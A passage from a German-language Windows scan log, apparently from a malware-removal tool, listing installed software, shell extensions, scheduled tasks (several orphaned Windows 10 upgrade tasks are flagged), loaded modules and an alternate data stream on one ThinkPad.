Lenovo System Interface Foundation Driver (HKLM\...\{C2E5CA37-C862-4A69-AC6D-24F450A20C16}) (Version: 1.0.078.00 - Lenovo)
Lexicon Omega Driver (HKLM\...\{2A837CDD-8FD6-4287-B82E-0664C90BB15A}) (Version: 2.7 - Lexicon) Hidden
Lexicon Omega Driver (HKLM-x32\...\Lexicon Omega Driver) (Version: 2.7 - Lexicon)
Metric Collection SDK (HKLM-x32\...\{DDAA788F-52E6-44EA-ADB8-92837B11BF26}) (Version: 1.1.0008.00 - Lenovo Group Limited) Hidden
Microsoft OneDrive (HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\OneDriveSetup.exe) (Version: 17.3.6917.0607 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
NVIDIA 3D Vision Treiber 354.45 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 354.45 - NVIDIA Corporation)
NVIDIA Grafiktreiber 354.45 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 354.45 - NVIDIA Corporation)
NVIDIA Update 10.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 10.4.0 - NVIDIA Corporation)
NVIDIA WMI 2.22.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVWMI) (Version: 2.22.0 - NVIDIA Corporation)
OpenOffice 4.1.2 (HKLM-x32\...\{F5CAB1AF-7B1A-4CEC-B829-A3F699473AE1}) (Version: 4.12.9782 - Apache Software Foundation)
PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.21236 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7614 - Realtek Semiconductor Corp.)
Rhinoceros 5 (64-bit) (HKLM\...\{141B55B6-73E2-4F3F-9F59-7C477F186311}) (Version: 5.7.31207.07545 - Robert McNeel & Associates)
ScummVM 1.8.0 (HKLM-x32\...\ScummVM_is1) (Version: - The ScummVM Team)
Skype™ 7.36 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.36.101 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Spotify) (Version: 1.0.56.451.gb2f539fc - Spotify AB)
SRWare Iron (64-Bit) Version 48.2550.0 (HKLM\...\{BA85A29D-B48E-4826-BAEE-817024E52E29}_is1) (Version: 48.2550.0 - SRWare)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.17.115 - Synaptics Incorporated)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.72365 - TeamViewer)
ThinkPad Settings Dependency (HKLM\...\{08515684-CE49-47EF-B509-326A2E91BC5C}_is1) (Version: 3.0.1.29 - Lenovo) Hidden
T-RackS 3 Deluxe (HKLM-x32\...\{423C4130-EBC3-410A-B3A0-37BBF9D607D5}) (Version: 1.0.0 - IK Multimedia)
V-Ray for 3dsmax 2015 for x64 (HKLM\...\V-Ray for 3dsmax 2015 for x64) (Version: 3.20.03 - Chaos Software Ltd)
WibuKey Setup (WibuKey Remove) (HKLM\...\{00060000-0000-1004-8002-0000C06B5161}) (Version: Version 6.20 of 2013-Dec-18 (Build 1230) (Setup) - WIBU-SYSTEMS AG)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{073CB204-6B29-46FC-AB98-451F1D068741}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{8C23B656-4E6E-4B45-9920-9617168D39A3}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei
CustomCLSID: HKU\S-1-5-21-3349751938-1204465652-1694021483-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Autodesk\3ds Max 2015\Inventor Server\Bin\TestServer.dll => Keine Datei
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-06-26] (Dropbox, Inc.)
ContextMenuHandlers01: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ContextMenuHandlers01: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers01: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Keine Datei
ContextMenuHandlers04: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ContextMenuHandlers05: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-06-26] (Dropbox, Inc.)
ContextMenuHandlers05: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Keine Datei
ContextMenuHandlers05: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2016-11-02] (Intel Corporation)
ContextMenuHandlers05: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-05-01] (NVIDIA Corporation)
ContextMenuHandlers06: [PintoStartScreen] -> {470C0EBD-5D73-4d58-9CED-E91E22E23282} => C:\Windows\System32\appresolver.dll [2017-06-08] (Microsoft Corporation)
ContextMenuHandlers06: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers06: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Keine Datei
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {01D9090E-055B-47E6-9237-48A7AD893313} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {0348AA56-036B-49BD-ACA5-651D76113425} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {0B8AB8F7-A8C8-4648-837B-724FD28BB7EB} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {125C8702-F8E9-4607-A69A-827C81E217F3} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-02-23] (Dropbox, Inc.)
Task: {196313D9-F94B-4EBB-A563-871CC95A244F} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {20C24C14-DEEC-4084-8BC1-45364FEE0E6C} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe
Task: {2193CD8C-D45A-4571-AC73-2AFF7DDDCD65} - System32\Tasks\{D47AB256-778C-4756-BFF4-B5F38C8A441A} => pcalua.exe -a "C:\Program Files\World of Warcraft 1.12.1\WoW.exe" -d "C:\Program Files\World of Warcraft 1.12.1"
Task: {233D0047-31A5-40DE-8BC9-FCF166E1E548} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {25DAF7F8-2048-43D9-9CA3-C335828F4532} - System32\Tasks\{C33EC7F1-7E6C-4635-A9D8-DE9B48C4F5F2} => pcalua.exe -a "C:\Program Files\World of Warcraft 2.4.3\Wow.exe" -d "C:\Program Files\World of Warcraft 2.4.3"
Task: {2D27F44F-F282-4720-8EE9-5F2F758217F1} - System32\Tasks\RtHDVBg_LENOVO_MICPKEY => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-10-01] (Realtek Semiconductor)
Task: {330E747B-8045-43D9-AE55-D4C6B8254107} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {38C1E477-9549-4F3A-A622-DB2BE844D3FC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {38EF41BE-5CD7-4EAC-9C2B-D3C9BF305DBA} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\d7021b40-c8de-4075-8989-d44166534f8a => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-06-05] (Lenovo Group Limited)
Task: {3E54759A-7D66-45F1-8D30-B4BDB68BB5F3} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {40F17ABB-21F3-4E9E-A06F-5CC9526E5080} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {46AE9F37-C558-4167-B4AA-AC736E9BCF40} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {4C3A42E4-FB4F-40FE-9156-B276AA24C0BF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {4F6CC665-D711-4615-BA99-3634BD84A3CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {57322CE1-EEEA-49A8-AFDE-2A814B78F3FF} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {5ADECB7F-4E8A-4A4A-8E48-B1A950E7EDF1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {6229F9D6-65C1-4C81-B563-A8A011EE91D8} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {69ED972F-0507-43E0-B842-4ACC4A4C636A} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6B4326C0-4369-475B-9BD7-660E928B9078} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-06-02] (Lenovo)
Task: {72F2B2FA-6B40-427A-B40D-AD19949718D5} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe [2016-04-18] (Adobe Systems Incorporated)
Task: {7664EED0-BA9C-4AC1-BB8A-BE2EF3716B88} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32
Task: {7CF19C94-4370-4482-8B1C-31D7F80661CA} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {7F1D8057-FE69-4BE5-A7EC-D3EFD6DBEE01} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {82C043EC-E5CC-47E1-9692-0E00D829F248} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {844ACD9E-BD7D-474F-8117-6D90173B21F2} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {8717EEF6-E532-4C6C-A532-CB26B350F2BF} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {8BD97214-F360-4555-B780-8E98A751D90A} - System32\Tasks\RtHDVBg_Dolby => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-10-01] (Realtek Semiconductor)
Task: {8E22DE0B-F51D-4116-A8E2-03F2E91E1B28} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2015-10-01] (Realtek Semiconductor)
Task: {985B667F-5809-47FB-B953-0CE916B386C7} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {99265848-09F9-4807-89BC-ADE8DED3AFE3} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => Sc.exe START ImControllerService
Task: {9B828E07-B816-4CD7-ADFA-1B5F9AD26442} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {9FB0B6E1-8348-4D3C-8907-4EDA7C5340A5} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {AE4B9823-9A54-4135-ABA7-B40C512E17A4} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-02-23] (Dropbox, Inc.)
Task: {AE8D0CF6-2EF8-4189-BE67-995466304543} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {B6057C25-D59A-4344-A92A-B2034A515A19} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {B977E6C5-B009-48BD-B2AA-DC32B1E763AF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {B9F5F195-100B-41F3-BF0C-58B05B9B4103} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-02-19] (Intel(R) Corporation)
Task: {BB42B4FB-073D-45F9-A76B-1212343A6AC1} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> Keine Datei <==== ACHTUNG
Task: {C2546E5D-79C2-4541-9E39-E0D6ED7AAE71} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Keine Datei <==== ACHTUNG
Task: {C5D88ED0-F2CC-4454-8C31-965F8FC0C2A0} - System32\Tasks\DolbySelectorTask => C:\Program Files\Dolby Digital Plus\ddp.exe
Task: {C752F5F1-D27B-4954-AA2B-9C4E4500D357} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {CA3B4A87-99F8-4810-BF19-A18F1B3107DB} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {D35C04F6-8F88-4A03-8BA2-89159AC22A37} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Keine Datei <==== ACHTUNG
Task: {D56A0AC7-5318-4063-BBFA-A316BB8376D3} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-06-02] (Lenovo)
Task: {DFD6BAEA-857D-47A9-9549-63E9AC2DC5B7} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {E02EBA99-651C-441A-A6DF-AEF563A9822D} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-06-02] ()
Task: {E0FFE99A-6A7C-442F-AB93-8EB9D8109C61} - System32\Tasks\Lenovo\Lenovo Settings Power => Rundll32.exe "C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.dll",PwrMgrBkGndMonitor
Task: {E199183F-6CCA-42E0-8834-0B9241326AB6} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {F6305F54-EAFE-4AFF-9F0F-1B9D0630DE8D} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {FA52DB1A-7F2B-4BF0-81D5-DC5856B6BFE6} - System32\Tasks\Microsoft\Windows\PLA\LSC Memory => Rundll32.exe C:\WINDOWS\system32\pla.dll,PlaHost "LSC Memory" "$(Arg0)"
Task: {FCF54764-174B-4899-B8D3-E365E576C6F3} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\c9012fed-5674-4317-91c3-83c569e66191 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-06-05] (Lenovo Group Limited)
Task: {FE295463-A538-4E94-B586-9A9AEF092B99} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
==================== Verknüpfungen & WMI ========================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
ShortcutWithArgument: C:\Users\ararat\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\6fa8d4dcdac59e60\Chromium.lnk -> C:\Program Files\SRWare Iron (64-Bit)\chrome.exe (SRWare) -> --profile-directory=Default
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2016-02-11 20:38 - 2015-12-22 12:38 - 03180176 _____ () C:\Windows\system32\nvwmi64.exe
2016-02-15 22:01 - 2016-02-15 22:01 - 00031256 _____ () C:\WINDOWS\System32\us008lm.dll
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-20 16:50 - 2017-04-28 08:03 - 00213880 _____ () C:\Program Files (x86)\ThinkPad\Utilities\GR\PWMRT64V.DLL
2016-02-13 16:12 - 2016-02-02 16:37 - 02570752 _____ () C:\Program Files\SRWare Iron (64-Bit)\libglesv2.dll
2016-02-13 16:12 - 2016-02-02 16:37 - 00087552 _____ () C:\Program Files\SRWare Iron (64-Bit)\libegl.dll
2016-04-21 18:33 - 2013-12-22 08:22 - 00047496 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\QtSolutions_Service-head.dll
2016-04-21 18:33 - 2013-12-22 08:22 - 00104328 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\qjson0.dll
2016-02-25 21:38 - 2016-02-25 21:38 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\WINDOWS\system32\Drivers\hyoidxux.sys:changelist [782]
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
